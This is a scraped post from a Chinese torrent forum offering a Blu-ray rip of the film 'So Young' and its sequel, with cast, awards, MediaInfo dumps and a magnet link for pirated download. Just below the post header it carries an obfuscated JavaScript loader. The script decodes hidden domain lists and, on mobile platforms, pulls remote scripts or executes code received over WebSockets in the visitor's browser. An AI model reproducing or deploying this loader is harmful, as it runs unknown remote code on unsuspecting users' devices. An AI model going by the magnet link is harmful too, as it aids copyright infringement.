致我们终将逝去的青春[国语音轨/简繁字幕].So.Young.1-2.2013-2016.BluRay.1080p.DTS-HD.MA.5.1.x265.10bit-迅雷下载 21.75GB

版主小s 20天前 220

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 致我们终将逝去的青春 / 致青春 / So Young / To Our Youth That Is Fading Away

◎年 代 2013

◎产 地 中国大陆

◎类 别 剧情 / 爱情

◎语 言 汉语普通话

◎上映日期 2013-04-26(中国大陆) / 2014-05-01(中国台湾)

◎IMDb链接 https://www.imdb.com/title/tt2765340/

◎豆瓣评分 6.5/10 (461619人评价)

◎豆瓣链接 https://movie.douban.com/subject/6973376/

◎片 长 132分钟

◎导 演 赵薇 Wei Zhao (id:1163713)

◎编 剧 李樯 Qiang Li (id:1274642)

辛夷坞 Yiwu Xin (id:1350121)

梅峰 Feng Mei (id:1275132)

◎演 员 杨子姗 Zishan Yang (id:1312862)

赵又廷 Mark Chao (id:1274608)

韩庚 Geng Han (id:1275667)

江疏影 Shuying Jiang (id:1323729)

刘雅瑟 Yase Liu (id:1276157)

张瑶 Yao Zhang (id:1318734)

包贝尔 Bei'er Bao (id:1315866)

郑恺 Kai Zheng (id:1275564)

王佳佳 Jiajia Wang (id:1317520)

黄宥明 Youming Huang (id:1275882)

佟丽娅 Liya Tong (id:1275756)

孙玮 Wei Sun (id:1324464)

王森 Sen Wang (id:1314632)

黄小蕾 Xiaolei Huang (id:1316146)

杨澜 Lan Yang (id:1328440)

宫哲 Zhe Gong (id:1275029)

崔文璐 Wenlu Cui (id:1334226)

韩红 Hong Han (id:1328439)

潘虹 Hong Pan (id:1043330)

李大光 Daguang Li (id:1318457)

马小宁 Xiaoning Ma (id:1338502)

郝姗姗 Shanshan Hao (id:1344577)

梅峰 Feng Mei (id:1275132)

金晨 Chen Jin (id:1419363)

韩三平 Sanping Han (id:1274843)

柯利明 Liming Ke (id:1447435)

关锦鹏 Stanley Kwan (id:1028510)

窦鹏 Peng Dou (id:1331830)

王菲 Faye Wong (id:1004858)

赵英俊 Yingjun Zhao (id:1315474)

贾雪 Xue Jia (id:1426037)

牛超 (id:1424387)

◎标 签 青春 / 爱情 / 校园 / 成长 / 文艺 / 小说改编 / 2013 / 剧情

◎简 介

18岁的郑微(杨子姗饰)终于如愿考上青梅竹马邻家大哥哥林静(韩庚饰)所在学校的邻校,等她满怀期冀地步入大学校园,却遭遇打击——林静出国留学,杳无音信。郑微倍感失落,患难时刻与室友阮莞(江疏影饰)、朱小北(刘雅瑟饰)、黎维娟(张瑶饰)及师哥老张-张开(包贝尔饰)结下深厚友谊,同时富家公子许开阳(郑恺饰)对郑微展开了疯狂的追求,而备受男生欢迎的阮莞用她特有的清冷守护着对于心爱人赵世永(黄明饰)的忠贞。一次偶然的误会使郑微与老张室友陈孝正(赵又廷饰)结为死敌,在一次次地反击中,郑微发现自己爱上了这个表面冷酷、内心善良的高材生,于是疯狂地反击演变为死缠烂打地追求,而陈孝正也终于在强攻之下缴械投降,欢喜冤家终成甜蜜恋人。大四毕业之际郑微的生活再次经受考验:陈孝正得到曾毓(王嘉佳饰)的出国留学名额,却迟迟不敢告诉郑微,感觉再次被欺骗的郑微痛...

◎获奖情况 (共28项)

第50届台北金马影展 (2013)

金马奖 最佳改编剧本

└──李樯 (id:1274642)

金马奖 最佳新导演(提名)

└──赵薇 (id:1163713)

金马奖 最佳美术设计(提名)

└──李杨 (id:1331248)

金马奖 最佳原创歌曲(提名)

第33届香港电影金像奖 (2014)

最佳两岸华语电影

第29届中国电影金鸡奖 (2013)

最佳改编剧本(提名)

└──李樯 (id:1274642)

最佳女主角(提名)

└──杨子姗 (id:1312862)

最佳导演处女作

└──赵薇 (id:1163713)

第32届大众电影百花奖 (2014)

最佳故事片(提名)

最佳导演

└──赵薇 (id:1163713)

最佳编剧

└──李樯 (id:1274642)

最佳女主角(提名)

└──杨子姗 (id:1312862)

最佳男配角(提名)

└──包贝尔 (id:1315866)

└──韩庚 (id:1275667)

第15届中国电影华表奖 (2013)

优秀新人女演员奖

└──杨子姗 (id:1312862)

优秀青年创作影片

第8届亚洲电影大奖 (2014)

最佳新演员

└──江疏影 (id:1323729)

最佳男配角(提名)

└──赵又廷 (id:1274608)

最佳编剧(提名)

└──李樯 (id:1274642)

第14届华语电影传媒大奖 (2014)

观众票选最受瞩目电影(提名)

观众票选最受瞩目女演员(提名)

└──杨子姗 (id:1312862)

第21届北京大学生电影节 (2014)

最佳女演员奖(提名)

└──杨子姗 (id:1312862)

最佳处女作奖(提名)

└──赵薇 (id:1163713)

第4届豆瓣电影鑫像奖 (2014)

鑫豆单元 最佳爱情片(提名)

豆渣单元 最渣影片(华语)(提名)

豆渣单元 最渣导演(华语)(提名)

└──赵薇 (id:1163713)

鑫豆单元 最佳歌曲(提名)

豆渣单元 最渣男演员(华语)(提名)

└──赵又廷 (id:1274608)

└──韩庚 (id:1275667)

豆渣单元 最渣女演员(华语)(提名)

└──杨子姗 (id:1312862)

  1. General

  2. Unique ID : 235894314169155145407172025703780086351 (0xB17797A3643A1BD915CE8B2DB1A8724F)

  3. Complete name : [email protected]M.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 14.5 GiB

  7. Duration : 2 h 11 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 15.8 Mb/s

  10. Encoded date : UTC 2021-07-11 05:56:03

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 2 h 11 min

  20. Bit rate : 12.4 Mb/s

  21. Width : 1 920 pixels

  22. Height : 804 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.334

  30. Stream size : 11.4 GiB (78%)

  31. Title : HEVC, [email protected]@High, 24 fps @ 12380 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / total-frames=189546 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : MLP FBA

  44. Format/Info : Meridian Lossless Packing FBA

  45. Commercial name : Dolby TrueHD

  46. Codec ID : A_TRUEHD

  47. Duration : 2 h 11 min

  48. Bit rate mode : Variable

  49. Bit rate : 2 593 kb/s

  50. Maximum bit rate : 4 146 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 96.0 kHz

  54. Frame rate : 1 200.000 FPS (80 SPF)

  55. Compression mode : Lossless

  56. Stream size : 2.38 GiB (16%)

  57. Title : Mandarin Dolby TrueHD Audio 5.1 @ 2593 kbps

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 2 h 11 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 603 MiB (4%)

  76. Title : Mandarin Dolby Digital 5.1-EX @ 640 kbps

  77. Language : Chinese

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Text #1

  82. ID : 4

  83. Format : PGS

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 2 h 5 min

  87. Bit rate : 34.9 kb/s

  88. Count of elements : 3794

  89. Stream size : 31.3 MiB (0%)

  90. Title : Cht/SUP 原盘繁体

  91. Language : Chinese

  92. Default : No

  93. Forced : No


  94. Text #2

  95. ID : 5

  96. Format : PGS

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 2 h 5 min

  100. Bit rate : 34.7 kb/s

  101. Count of elements : 3794

  102. Stream size : 31.2 MiB (0%)

  103. Title : Chs/SUP 原盘简体

  104. Language : Chinese

  105. Default : Yes

  106. Forced : No


  107. Text #3

  108. ID : 6

  109. Format : PGS

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 2 h 5 min

  113. Bit rate : 38.4 kb/s

  114. Count of elements : 3794

  115. Stream size : 34.5 MiB (0%)

  116. Title : Eng/SUP

  117. Language : English

  118. Default : No

  119. Forced : No


  120. Menu

  121. 00:00:00.000 : en:第 01 章

  122. 00:10:50.542 : en:第 02 章

  123. 00:22:23.167 : en:第 03 章

  124. 00:32:49.708 : en:第 04 章

  125. 00:43:48.375 : en:第 05 章

  126. 00:56:14.000 : en:第 06 章

  127. 01:06:58.458 : en:第 07 章

  128. 01:15:31.292 : en:第 08 章

  129. 01:27:03.500 : en:第 09 章

  130. 01:40:03.042 : en:第 10 章

  131. 01:51:43.000 : en:第 11 章

  132. 02:00:14.792 : en:第 12 章




复制代码

  1. General

  2. Unique ID : 314620199130897891768023365169942414832 (0xECB1A571653BA9D592D29FA24268C5F0)

  3. Complete name : So.Y[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.23 GiB

  7. Duration : 1 h 39 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 10.4 Mb/s

  10. Encoded date : UTC 2021-07-11 05:59:01

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 39 min

  20. Bit rate : 7 624 kb/s

  21. Width : 1 920 pixels

  22. Height : 806 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.205

  30. Stream size : 5.30 GiB (73%)

  31. Title : HEVC, [email protected]@High, 24 fps @ 7623 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x806 / interlace=0 / total-frames=143453 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : MLP FBA

  44. Format/Info : Meridian Lossless Packing FBA

  45. Commercial name : Dolby TrueHD

  46. Codec ID : A_TRUEHD

  47. Duration : 1 h 39 min

  48. Bit rate mode : Variable

  49. Bit rate : 2 016 kb/s

  50. Maximum bit rate : 3 090 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 96.0 kHz

  54. Frame rate : 1 200.000 FPS (80 SPF)

  55. Compression mode : Lossless

  56. Stream size : 1.40 GiB (19%)

  57. Title : Mandarin Dolby TrueHD Audio 5.1 @ 2016 kbps

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 39 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 456 MiB (6%)

  76. Title : Mandarin Dolby Digital 5.1-EX @ 640 kbps

  77. Language : Chinese

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Text #1

  82. ID : 4

  83. Format : PGS

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 31 min

  87. Bit rate : 21.5 kb/s

  88. Count of elements : 1984

  89. Stream size : 14.1 MiB (0%)

  90. Title : Cht/SUP 原盘繁体

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No


  94. Text #2

  95. ID : 5

  96. Format : PGS

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 31 min

  100. Bit rate : 25.0 kb/s

  101. Count of elements : 1983

  102. Stream size : 16.3 MiB (0%)

  103. Title : Eng/SUP

  104. Language : English

  105. Default : No

  106. Forced : No


  107. Menu

  108. 00:00:00.000 : en:第 01 章

  109. 00:07:45.667 : en:第 02 章

  110. 00:16:51.125 : en:第 03 章

  111. 00:23:23.042 : en:第 04 章

  112. 00:33:23.750 : en:第 05 章

  113. 00:42:36.250 : en:第 06 章

  114. 00:50:04.667 : en:第 07 章

  115. 00:58:10.917 : en:第 08 章

  116. 01:06:09.583 : en:第 09 章

  117. 01:14:51.833 : en:第 10 章

  118. 01:22:15.667 : en:第 11 章

  119. 01:31:44.208 : en:第 12 章


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:3468480A6F57B148701D8917D9D441DDE2109CE8
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回